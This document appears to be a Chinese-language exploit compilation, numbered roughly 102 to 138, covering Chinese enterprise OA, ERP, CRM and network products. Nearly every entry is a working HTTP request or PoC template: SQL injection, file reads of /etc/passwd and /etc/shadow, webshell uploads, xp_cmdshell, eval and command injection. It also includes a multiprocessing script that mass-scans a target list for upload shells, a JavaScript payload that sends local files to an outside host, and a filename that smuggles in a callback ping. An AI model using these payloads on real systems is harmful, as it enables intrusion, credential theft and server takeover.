漏洞描述:明源地产ERP系统具有丰富的房地产行业经验和定制化功能,可以适应不同企业的需求。该系统存在sql注入漏洞,可获取服务器权限
poc:
relative: req0 && req1
session: false
requests:
- method: GET
timeout: 13
path: /cgztbweb/VisitorWeb/VisitorWeb_XMLHTTP.aspx?ParentCode=1';WAITFOR%20DELAY%20'0:0:5'--&ywtype=GetParentProjectName
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.3119.54 Safari/537.36
follow_redirects: true
matches: (time.gt("5") && time.lt("10"))
- method: GET
timeout: 10
path: /cgztbweb/VisitorWeb/VisitorWeb_XMLHTTP.aspx?ParentCode=1';WAITFOR%20DELAY%20'0:0:0'--&ywtype=GetParentProjectName
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/89.0.3119.54 Safari/537.36
follow_redirects: true
matches: time.lt("5")103、致远OA_V8.1SP2文件上传漏洞
POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64,rident/7.0; ry:11.0)
Accept-Encoding: gzip,deflate
Cookie:JSESSIONID=5bGx5rW35LmL5YWz
Cache-Control: no-cache
Content-Encoding: deflate
Pragma: no-cache
Host: 1.1.1.1
Accept: text/html,image/gif, image/jpeg,*; q=.2,*/*; q=.2
Content-Length:522729
Connection: close
X-Forwarded-For: 1.2.3.4
arguments={"formulaName":"test","formulaAlias":"safe_pre","formulaType":"2","formulaExpression":"","sample":"马子"}104、致远 OA 协同管理软件无需登录 getshell
访问 : ip/seeyon/htmlofficeservlet
如果出现下图所示的内容,表示存在漏洞。
构造 PoC
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2
dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
webshell105、LiveBos ShowImage.do 文件 imgName 参数读取漏洞
LiveBOS(简称LiveBOS)是顶点软件股份有限公司开发的一个对象型业务架构中间件及其集成开发工具。LiveBos ShowImage.do 文件 imgName 参数存在文件读取漏洞,攻击者可以获取大量敏感信息。
Condition: body="LiveBos" || body="/react/browser/loginBackground.png"
poc:
relative: req0
session: false
requests:
- method: GET
timeout: 10
path: /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/69.0.1141.87 Safari/537.36
follow_redirects: true
matches: (code.eq("200") && body.contains("home/livebos") && body.contains("root:"))107、东方通 TongWeb 系统
漏洞描述:通过与厂商沟通获悉,如下补丁为针对HW专用,建议企业联系厂商获取漏洞修复方案,及时安全加固、修补漏洞,消除隐患。
补丁链接:https://tongtech.com/dft/download.html
补丁名称:
TongWeb安全升级补丁包SR-001.part1
TongWeb安全升级补丁包SR-001.part2
TongWeb安全升级补丁包SR-001.part3
TongWeb安全升级补丁包SR-002
TongWeb6&7文件上传和下载功能安全升级补丁包
TongWeb应用服务器产品控制台安全升级补丁包
TongWeb6&7命令行上传文件功能升级补丁
TongWeb5命令行上传文件功能升级补丁
TongWeb应用服务器产品控制台安全升级补丁包
安全运营中心建议:
1、建议云防开启高阻断策略,等修复完逐项放开
2、没上云防的功能重点监控,所有互联网扫描直接封堵
108、蓝凌oa文件上传漏洞
SQL
1. 接口上传带马的zip包(aaa绕waf)
(绕过WAF的内容有500k的大小,这里就不上传了,只写出相关特征)
POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1
X-Real-IP:
X-Forwarded-For:
Host:
X-Forwarded-Proto: https
X-B3-TraceId: a22c34f91eb9bd9e1326b3cc54aa23e9
X-B3-SpanId: a22c34f91eb9bd9e1326b3cc54aa23e9
Content-Length: 500817
Content-Type: multipart/form-data; boundary=********************1692085217190
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg,
2. 接口传参访问马
POST /resource/ui-component/themes/logs.jsp HTTP/1.1
X-Real-IP:
X-Forwarded-For:
Host:
X-Forwarded-Proto: https
X-B3-TraceId: 2b5ccdfac376359b2f4ead71fe65db9d
X-B3-SpanId: 2b5ccdfac376359b2f4ead71fe65db9d
Content-Length: 42500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: SESSION=OWM5MjdiYjYtMjJjNy00OTlkLWJjNTktMTE1NDI3ZDhjMTc0; SERVERID=357e46e5f6aa75f389927a23b666915b|1692085247|1692083970
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
3. 访问马 login.jsp
GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=c36d5527fd784aa29748b3b1c50be7bc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close110、金和jc6存在任意文件上传漏洞
金和OA是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。因未对接口进行过滤限制,导致了任意文件的上传,可上传木马从而控制服务器
修复建议:
对上传⽂件的⼤⼩和类型进⾏校验,定义上传⽂件类型⽩名单。
检索语法:body="jc6/platform"
SQL
POC特征如下:
/C6/Jhsoft.Web.module/eformaspx/editeprint.aspx?key=writefile&filename=1.ashx&KeyCode=sxfZyQBw8yQ=&designpath=/C6/&typeid=&sPathfceform=./
poc:
relative: req0 && req1
session: false
get_variables:
- payload: base64Decode("SGVsbG8gV29ybGQgICAgIDg3ICAgICAgICAgICAgICAwICAgICAgICAgICAgICAgIDUzMyAgICAgICAgICAgIA0KREJTVEVQPVJFSlRWRVZRDQpPUFRJT049VTBGV1JVWkpURVU9DQpGSUxFTkFNRT1MaTR2TGk0dmNIVmliR2xqTDJWa2FYUXZhVzVtYnk1cWMzQT0NCjwlb3V0LnByaW50bG4oIm9ubHkgdGVzdCIpOyU+DQo=")
requests:
- method: POST
timeout: 35
path: /jc6/OfficeServer
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/87.0.1482.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
data: '{{payload}}'
follow_redirects: true
matches: code.eq("200")
- method: GET
timeout: 10
path: /public/edit/info.jsp
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/87.0.1482.110 Safari/537.36
follow_redirects: true
matches: (code.eq("200") && body.contains("only test"))111、深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞
SQL
POST /php/catjs.php
["../../../../../../etc/shadow"]112、亿赛通电子文档安全管理系统任意文件上传漏洞
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0文件内容
113、明御 SQL注入
SQL
/cqztbweb/VisitorWeb/VisitorWeb_XMLHTTPaspx?ParentCode=1'114、锐捷Ruijie路由器命令执行漏洞
GET /cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=1 HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://IP:PORT/cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis
Cookie: sysauth=b0d95241b0651d5fbaac5de8dabd2110115、Jeecg-Boot Freemarker 模版注入漏洞
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025","id":"1"}116、Yakit任意文件读取
前言:
yakit是近年新兴的一个BurpSuite平替工具,和burp的区别就在于数据包放过去不用配置ip端口协议这些,但是yakit跑起来感觉卡卡的,远不如burp那么流畅,近期yakit爆出了一个任意文件读取漏洞,此漏洞通过在网页嵌入js代码实现读取yakit使用者设备上的文件
触发版本:
引擎版本< Yaklang 1.2.4-sp2
漏洞条件:
使用yakit的MITM代理并且启用任意插件
Payload
<script>
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://yakit.com/filesubmit");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(`file={{base64enc(file(C:\\Windows\\System32\\drivers\\etc\\hosts))}}`);
</script>监听脚本
#! /bin/python3
import socket
# 监听地址和端口
host = '0.0.0.0'
port = 23800
# 创建socket服务器
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定并监听端口
server.bind((host, port))
server.listen()
# 接收连接并监听请求
print("Listening...")
while True:
# 接收客户端连接请求
client, address = server.accept()
print(f"Connected by {address}")
# 读取客户端请求数据
request = ''
while True:
input_data = client.recv(1024).decode('utf-8')
request += input_data
if len(input_data) < 1024:
break
# 提取请求头部
headers = request.split('\n')
print("Received headers:")
for header in headers:
print(header)
# 关闭客户端连接
client.close()复现开始:
创建一个html页面并插入payload
启用MITM代理,不启用插件进行访问:
https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wMXX7dh9j86aZ7JA0WMoxwHSDdAwnMVSZLoF09zuiamTpkibBtLto8y8KA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1
启用MITM代理并启用插件进行访问:
https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wM1RvwO5nnYhpX3aKZeCDdziaCEcOSDfbIcu2wNe27x7aTsPgBXo8KTsQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1
原理:yakit默认不会对经过MITM代理的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。
117、任我行CRM系统SQL注入漏洞
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
Keywords=&StartSendDate=2023-07-17&EndSendDate=2023-08-10&SenderTypeId=0000000000*
SenderTypeId参数存在注入,可在SenderTypeId参数值0000000000后自行闭合注入,也可将数据包直接放入sqlmap进行验证118、蓝凌OA前台代码执行
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}119、致远 M3 反序列化 远程命令执行漏洞(XVE-2023-24878)
漏洞信息:
https://x.threatbook.com/v5/vul/6bf25402a41b4fc27497a5b42a8421d7ef38d57cb7d8143dedb9a6f438310a2d9e083c39c56fee2571651827b4d9ce8d
利用 CB1 生成 hex 反序列化数据,替换 POC 中的 HEX
POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_82116c626a8d504a5c0675073362ef6f=1666334057
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 3680
[{"userMessageId":"{\"@\u0074\u0079\u0070\u0065\":\"\u0063\u006f\u006d\u002e\u006d\u0063\u0068\u0061\u006e\u0067\u0065\u002e\u0076\u0032\u002e\u0063\u0033\u0070\u0030\u002e\u0057\u0072\u0061\u0070\u0070\u0065\u0072\u0043\u006f\u006e\u006e\u0065\u0063\u0074\u0069\u006f\u006e\u0050\u006f\u006f\u006c\u0044\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\",\"\u0075\u0073\u0065\u0072\u004f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0073\u0041\u0073\u0053\u0074\u0072\u0069\u006e\u0067\":\"\u0048\u0065\u0078\u0041\u0073\u0063\u0069\u0069\u0053\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0064\u004d\u0061\u0070:HEX;\"}|","channelId":"111","title":"111","content":"222","deviceType":"androidphone","serviceProvider":"baidu","deviceFirm":"other"}]然后再 Get 访问/mobile_portal/api/systemLog/pns/loadLog/app.log
120、致远 OA wpsAssistServlet 任意文件读取(XVE-2023-25300)
POST /seeyon/wpsAssistServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
flag=template&templateUrl=C:/windows/system.ini121、nginxWebUI 远程代码执行漏洞
1.payload(命令执行1):
http://localhost:8080/AdminPage/conf/reload?nginxExe=calc%20%7C
2:payload(命令执行2):
POST /AdminPage/conf/check HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 151
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SOLONID=1788f71299dc4608a355ff347bf429fa
Connection: close
nginxExe=calc%20%7C&json=%7B%22nginxContent%22%3A%22TES%22%2C%22subContent%22%3A%5B%22A%22%5D%2C%22subName%22%3A%5B%22A%22%5D%7D&nginxPath=C%3A%5CUsers
3.payload:
//第一步设置属性
http://localhost:8080/AdminPage/conf/saveCmd?nginxExe=calc%20%7c&nginxPath=a&nginxDir=a
//第二步执行命令
http://localhost:8080/AdminPage/conf/checkBase
可通过../ 控制文件上传路径,上传计划任务122、用友-GRP-U8 全版本 sql 注入漏洞(XVE-2023-24864)
POST /services/operOriztion HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Connection: close
Content-Length: 861
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: text/xml;charset=UTF-8
Cookie: JSESSIONID=276A2040BB09CD01F9AD891F65848109; xMsg11=1; xMsg13=1
Soapaction:
Upgrade-Insecure-Requests: 1
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsdd="http://xml.apache.org/axis/wsdd/">
<soapenv:Header/>
<soapenv:Body>
<wsdd:getGsbmfaByKjnd soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<kjnd xsi:type="xsd:string">gero et' UNION ALL SELECT (SELECT TOP 1 CHAR(113)+CHAR(106)+CHAR(107)+CHAR(112)+CHAR(113)+ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(113) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 9 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY 1) ORDER BY 1)-- xJKO</kjnd>
</wsdd:getGsbmfaByKjnd>
</soapenv:Body>
</soapenv:Envelope>123、用友 U8 CRM 客户关系管理系统 getemaildata.php 任意文件上传漏洞
app="用友-U8CRM"
import requests
import urllib3
import multiprocessing
import re
urllib3.disable_warnings()
proxies = {
"http": "http://127.0.0.1:7890",
"https": "http://127.0.0.1:7890"
}
headers = {
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ"
}
data = '''------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: text/plain
<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ'''
def poc(url):
target = url + "/ajax/getemaildata.php?DontCheckLogin=1"
try:
r = requests.post(target, data=data, verify=False,proxies=proxies,allow_redirects=False,headers=headers)
pattern = r'\\\\mht([0-9A-Fa-f]+)\.tmp\.mht'
match = re.search(pattern, r.text)
if match:
tmp_file_name = match.group(1)
decimal = int(tmp_file_name, 16)
decimal -= 1
new_hex = hex(decimal)[2:].upper()
filename = "upd" + new_hex + ".tmp.php"
if requests.get(url + f"/tmpfile/{filename}").status_code == 200:
with open("result.txt", "a") as f:
f.write(target + "\n")
f.close()
print("shell 地址:" + url + f"/tmpfile/{filename}")
else:
pass
except:
pass
if __name__ == "__main__":
with open("ip.txt") as file:
urls = [line.strip("\n") for line in file]
with multiprocessing.Pool() as pool:
pool.map(poc,urls)124、用友 U8 CRM 客户关系管理系统 getemaildata.php 任意文件读取漏洞
/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini125、用友 NC uploadControl_uploadFile 任意文件上传
POST /mp/uploadControl/uploadFile HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=7456D96F1B0F27B4C361EB7F6C5C1FE1.server; mp_name=admin;JSESSIONID=F5E62B60F069DA492605F276E527A71C.server
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp
Content-Length: 312
------WebKitFormBoundaryoDIsCqVMmF83ptmp
Content-Disposition: form-data; name="file"; filename="testpoc.jsp"
Content-Type: application/octet-stream
Hello Administrator!
------WebKitFormBoundaryoDIsCqVMmF83ptmp
Content-Disposition: form-data; name="submit"
上传
------WebKitFormBoundaryoDIsCqVMmF83ptmp
Webshell 地址 /mp/uploadFileDir/testpoc.jsp126、易思软件-智能物流无人值守系统 ImportReport 任意文件上传
POST /Sys_ReportFile/ImportReport?encode=health HTTP/1.1
Host:
Content-Length: 212
X-File-Name: test.grf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryxzUhGld6cusN3Alk
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: currentmoduleId=; prevcurrentmoduleId=; ASP.NET_SessionId=dwgpzkmpqdwkgfefjcwxzr4f;__RequestVerificationToken=MuLUdOygmXaoLwVszqtimhifsVREHIu-alcI9SLBiM617s7kK1M1El1pgO6fm5yIs1_PUNSX-ZQAfk0baq_6cA6RGMPKc5K87XTsMDG2bSs1
Connection: close
------WebKitFormBoundaryxzUhGld6cusN3Alk
Content-Disposition: form-data; name="file"; .filename="test.grf;.aspx"
Content-Type: application/octet-stream
hello world
------WebKitFormBoundaryxzUhGld6cusN3Alk--127、万户 ezOFFICE 任意文件上传漏洞
POST /defaultroot/services/FileTest;1.js HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,fil;q=0.6
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 1642
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:util="http://com.whir.ezoffice.ezform.util.StringUtil"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<util:printToFile
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<fileName xsi:type="soapenc:string">../server/oa/deploy/defaultroot.war/public/upload/date.jsp.</fileName>
<content xsi:type="soapenc:string"><%
    out.print("hello world!");
%></content>
</util:printToFile>
</soapenv:Body>
</soapenv:Envelope>128、通达 OA 11.10 getdata 远程命令执行漏洞
POST /general/appbuilder/web/portal/gateway/getdata?activeTab=%E6%88%91%27,1=%3Eeval($_POST[x]));/*&id=19&module=Carouselimage HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cache-Control: max-age=0
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=1lldisf83r1h3uruph3cj5jjc1; KEY_RANDOMDATA=17684
Origin: http://183.149.216.196:81
Referer: http://183.149.216.196:81/general/appbuilder/web/portal/gateway/getdata?activeTab=%E6%88%91%27,1=%3Eeval($_POST[x]));/*&id=19&module=Carouselimage
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
x=echo+success%3B129、时空智友企业流程化管控系统 login 文件读取漏洞
POST /login HTTP/1.1
Host:
Content-Length: 99
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/sign
ed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __qypid=""; JSESSIONID=B9F80FA819D6FD8F5361D79113F8ABE0
Connection: close
op=verify%7Clogin&targetpage=&errorpage=WEB-INF/web.xml&mark=&tzo=480&username=admin&password=admin130、时空智友企业流程化管控系统 formservice 文件上传漏洞
POST /formservice?service=attachment.write&isattach=false&filename=acebe1BA7BC18dB4.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 115
Accept-Encoding: gzip
<% out.println("CdaF3C8f77065666");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>上传成功后返回shell文件名
shell所在路径为:/form/temp/{返回的文件名}
如 Shell 地址:/form/temp/202308154fkbyxm20fpxwy0h_acebe1BA7BC18dB4.jsp
131、时空智友企业流程化管控系统 formservice SQL 注入漏洞
POST /formservice?service=workflow.sqlResult HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 91
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Content-Type: application/json
Accept-Encoding: gzip
{"params": {"a": "11"}, "sql": "select sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1234f56'))"}132、企望制造 ERP comboxstore.action 远程命令执行漏洞
POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host:
comboxsql=exec%20xp_cmdshell%20'whoami'133、绿盟 ads postrev.php 通过文件上传文件名任意命令执行
POST /postrev.php HTTP/1.1
Host:
Content-Length: 252
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4x5B9V0rUBOl9UnJ
Connection: close
------WebKitFormBoundary4x5B9V0rUBOl9UnJ
Content-Disposition: form-data; name="filename"; filename="1.jpg && ping dtq9.callback.red"
Content-Type: image/jpeg
------WebKitFormBoundary4x5B9V0rUBOl9UnJ--134、华测监测预警系统 数据库泄露漏洞
/web/Report/Rpt/Config/Config.xml135、华测监测预警系统 任意文件读取漏洞
POST /Handler/FileDownLoad.ashx HTTP/1.1
Host:
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Origin:
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
filename=1&filepath=..%2F..%2Fweb.config136、大为 lnnojet 知识产权协同创新管理系统管理员密码重置
访问下列路径直接进入密码重置界面
http://*.*.*.*/resetPwd.html?guid=IWBI9HveWf01GlDm+je0Ec+qvHyI7F5bjy3kRC2uESwC0+KPmTxUsgHqj+lUuY0F061yruzA+jkZFb9hhNqPhw%3D%3D137、大为 lnnojet 知识产权协同创新管理系统管理员密码重置
使用账户 justForTest 登陆,密码任意,即可进入后台
138、大华 DSS 视频管理平台远程命令执行
POST /portal/login_init.action HTTP/1.1
Host:
Content-Length: 279
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
